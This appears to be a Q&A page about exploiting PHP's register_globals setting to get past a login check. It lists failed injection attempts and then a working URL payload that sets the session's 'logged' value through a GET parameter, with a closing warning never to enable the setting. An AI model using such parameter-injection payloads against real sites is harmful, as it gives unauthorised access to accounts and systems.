Search code examples
phpweb-applicationswebserverregister-globals

register_globals exploit session array

I have a PHP script that executes some commands to verify that a user is logged.

if (( isset ($password) && $password!="" && auth($password,$hidden_password)==1) || (is_array($_SESSION) && $_SESSION["logged"]==1 ) ){
    $aff=display("you're logged in);
} else {
    $aff=display("you're not logged in");
}

If register_globals is set to 1 in my php.ini, and want to inject something into the URL to get authenticated every-time, whatever the password is, what can I do?

I already tried:

  • site.com/page.php?password=pass&logged=1
  • site.com/page.php?password=pass&_SESSION["logged"]=array("1")
  • site.com/page.php?password=pass&hidden_password=pass ==> returns "you're not logged in" but the thing is that I don't want to overwrite the Hidden_Password (I need it!)
  • I tried to play also with cookies, and other http headers, but with no results

Any hints?

Solution

  • Just tried site.php?_SESSION[logged]=1, and it works!

    You can modify globals when register_globals is set to 1, using the GET method.

    So yes, don't ever edit this option, if you're sure about it ;)